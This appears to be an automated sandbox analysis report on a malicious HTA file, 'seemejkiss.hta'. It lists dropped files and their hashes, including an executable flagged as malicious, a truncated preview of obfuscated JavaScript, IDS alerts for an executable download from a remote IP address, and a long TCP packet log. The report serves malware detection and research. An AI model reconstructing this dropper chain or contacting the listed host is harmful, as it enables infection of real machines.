SHA-256:	3E50544C522296B3C459D9B254107EACF4F7319DA8EF2A3D85EDEFBCC3C10060
SHA-512:	69BEB4B038B1FED8B8F6E74BE4A84E846DD7FABC4960A0DAD2766B66E3E93A382AC6A9E65AA9E753C20B935EE3AE6F017CBBE1337CD84760BA4E715D8DF2B8C4
Malicious:	false
Preview:	.o.UM1Z4\8AX.5F.W5KUN1ZtX8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X.AX9L*.FW.B.o.[x...0P1.6:8R94#.9U6V.,. Pf:"[k< ..{..,7]'.KE].KUN1Z4XA@Q..U!.jU,.sQ=.B..."R.R.i.V.....dY%..!4]v5).Z4X8AX9Be.HWyJTN..0.8AX9B5FH.5ITE0Q4XbEX9B5FHW5K.Z1Z4H8AXIF5FH.5KEN1Z6X8GX9B5FHW3KUN1Z4X81\9B7FHW5KUL1..X8QX9R5FHW%KU^1Z4X8AH9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z.,]9,9B5..S5KEN1Zn\8AH9B5FHW5KUN1Z4X.AXYB5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B

C:\Users\user\AppData\Local\Temp\RES3925.tmp

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Sat Dec 7 16:45:41 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.9875834893563256
Encrypted:	false
SSDEEP:	24:Hjm9poYcXKH8SQwKTFexmfwI+ycuZhNWTakSJ8PNnqSSd:OjcXKcKKTAxmo1ulWTa3JsqSC
MD5:	682F641446597F8E0C3F67FEF95751A3
SHA1:	04F096BB44030AB1E04359FA758946BD9193B065
SHA-256:	27953B9A787738F1BA6EADFB851141FACAA1063EC653D2009BD08A010E8AF58F
SHA-512:	82E945E3952F31B4D7E98FD4276B312EE4EEE4F6195BB9868952B7D40A7DE48B593E126843F829BE6E542AFEFE114801ACA3AA3B5896B58AE294CD134000FA5C
Malicious:	false
Preview:	L....{Tg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP..................9...Z..7..CeDT%...........5.......C:\Users\user\AppData\Local\Temp\RES3925.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.z.y.z.i.w.b.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjwt3tzc.v2e.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mos5rxu3.ovp.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqum0uuf.v2f.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wohg2k5o.5u2.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aut54AB.tmp

Process:	C:\Users\user\AppData\Roaming\winnit.exe
File Type:	data
Category:	dropped
Size (bytes):	289792
Entropy (8bit):	7.994669403497686
Encrypted:	true
SSDEEP:	6144:YEAaD0qK6K1SXPom559fNG9z+HsfcyfoSnPj+J:YE3BK1S/VL908HsUdSb+J
MD5:	63F3BA228146413B60B4C3036F6CC6E9
SHA1:	7558EB9BEAB56D2C5178B537E10FB6CA2A309EDA
SHA-256:	3E50544C522296B3C459D9B254107EACF4F7319DA8EF2A3D85EDEFBCC3C10060
SHA-512:	69BEB4B038B1FED8B8F6E74BE4A84E846DD7FABC4960A0DAD2766B66E3E93A382AC6A9E65AA9E753C20B935EE3AE6F017CBBE1337CD84760BA4E715D8DF2B8C4
Malicious:	false
Preview:	.o.UM1Z4\8AX.5F.W5KUN1ZtX8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X.AX9L*.FW.B.o.[x...0P1.6:8R94#.9U6V.,. Pf:"[k< ..{..,7]'.KE].KUN1Z4XA@Q..U!.jU,.sQ=.B..."R.R.i.V.....dY%..!4]v5).Z4X8AX9Be.HWyJTN..0.8AX9B5FH.5ITE0Q4XbEX9B5FHW5K.Z1Z4H8AXIF5FH.5KEN1Z6X8GX9B5FHW3KUN1Z4X81\9B7FHW5KUL1..X8QX9R5FHW%KU^1Z4X8AH9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z.,]9,9B5..S5KEN1Zn\8AH9B5FHW5KUN1Z4X.AXYB5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B5FHW5KUN1Z4X8AX9B

C:\Users\user\AppData\Roaming\winnit.exe

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.196631562868526
Encrypted:	false
SSDEEP:	24576:au6J33O0c+JY5UZ+XC0kGso6FazP6Qvmikfo2WY:su0c++OCvkGs9FazSQvfkfEY
MD5:	A97987DF137D1328F00AA6B81EBA4957
SHA1:	86D668C195909AE6A772B98EB59868D5B60D3195
SHA-256:	771CBB08F711A9AFB6EAA9846D0300C4828230B346FD41714B5B67A8B0BDCA62
SHA-512:	1E050E138C1255C76B1BE2035CC4FE68A1054693C027C1E569D80DE9326675B8E843E00E56A677435708913C0F2A8C4EA6A2217D8CC2DDCE030B3FBA6503E170
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Pg.........."..................}............@..................................B....@...@.......@.....................L...\|....p.......................p...q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q...p...r..................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	2.480878071998535
TrID:
File name:	seemejkiss.hta
File size:	158'792 bytes
MD5:	1839f55f0cfed85d442ba37410e344ed
SHA1:	6aa8c00d5a6bac164de92c747ca049a7847b00a4
SHA256:	6af62cafa5b80900dbacfd9425e9f5411a39f0152eb63dfdd093ef229c9b350b
SHA512:	c7926ef50aba2aa138252d6f1b7bd7b3f5f87da5426c907ec39341a34b947c7bfd806a865ee48aeafe71c7af5ec79d1882aef34e88aea5b3539ab49da074a869
SSDEEP:	96:4owZw9d6yfabmrFyjbBs6beC9rKFEntjkaj8v3NrFyjbBs6beCt7OrKFEntjkajl:4Lwq041GcPNhzXQ
TLSH:	E7F31041A92410A5F7FD5E96ACEDB74E35A4221EDECD9D8D4327FB80DCA324BA4408DC
File Content Preview:	<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-07T15:47:45.492685+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49706	107.175.113.196	80	TCP
2024-12-07T15:47:45.492739+0100	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	107.175.113.196	80	192.168.2.5	49706	TCP
2024-12-07T15:47:45.772482+0100	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	107.175.113.196	80	192.168.2.5	49706	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 7, 2024 15:47:44.248868942 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:44.368808985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:44.368895054 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:44.369126081 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:44.488862038 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492582083 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492611885 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492625952 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492685080 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.492727041 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.492738962 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492768049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492806911 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.492813110 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492825985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492846966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.492876053 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.492898941 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.493139982 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.493155003 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.493191957 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.612596035 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.612703085 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.612791061 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.616645098 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.620105982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.684746981 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.684763908 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.684854031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.688813925 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.688888073 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.688951015 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.697225094 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.697376966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.697438955 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.705651045 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.705689907 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.705725908 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.705765009 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.714042902 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.714118958 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.714122057 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.714160919 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.722515106 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.722577095 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.722625971 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.730772018 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.730904102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.730962038 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.739217043 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.739305973 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.739370108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.747572899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.747673035 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.747741938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.755986929 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.756119013 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.756189108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.764372110 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.764484882 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.764544010 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.772481918 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.772546053 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.876492977 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.876529932 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.876605034 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.877943993 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.877991915 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.878205061 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.878396988 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.883014917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.883065939 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.883167028 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.883208036 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.888032913 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.888109922 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.888142109 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.888199091 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.893084049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.893156052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.893193960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.893233061 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.897931099 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.898044109 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.898072958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.898087025 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.902625084 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.902672052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.902738094 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.902782917 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.907409906 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.907464981 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.907625914 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.907691002 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.912064075 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.912137985 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.912168980 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.912214994 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.916728973 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.916779995 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.916815042 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.916856050 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.921384096 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.921447039 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.921516895 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.921565056 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.926103115 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.926153898 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.926213980 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.926259995 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.930846930 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.930896044 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.930980921 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.931160927 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.935518026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.935570002 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.935657024 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.935703039 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.940186024 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.940243006 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.940273046 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.940315962 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.944899082 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.944947958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.945028067 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.945143938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.949605942 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.949662924 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.949692965 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.949737072 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.954370022 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.954452991 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.954593897 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.954648018 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.959022045 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.959073067 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.959074020 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.959122896 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:45.963748932 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.963784933 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:45.963839054 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.068659067 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.068680048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.068754911 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.069719076 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.069771051 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.069809914 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.069849014 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.073612928 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.073798895 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.073877096 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.077512026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.077650070 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.077714920 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.081470966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.081613064 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.081676960 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.085378885 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.085447073 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.085506916 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.089293957 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.089401960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.089462996 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.093180895 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.093242884 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.093286991 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.093327999 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.097116947 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.097213984 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.097258091 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.101023912 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.101109982 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.101169109 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.104897022 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.105010033 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.105066061 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.109117985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.109201908 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.109247923 CET	49706	80	192.168.2.5	107.175.113.196
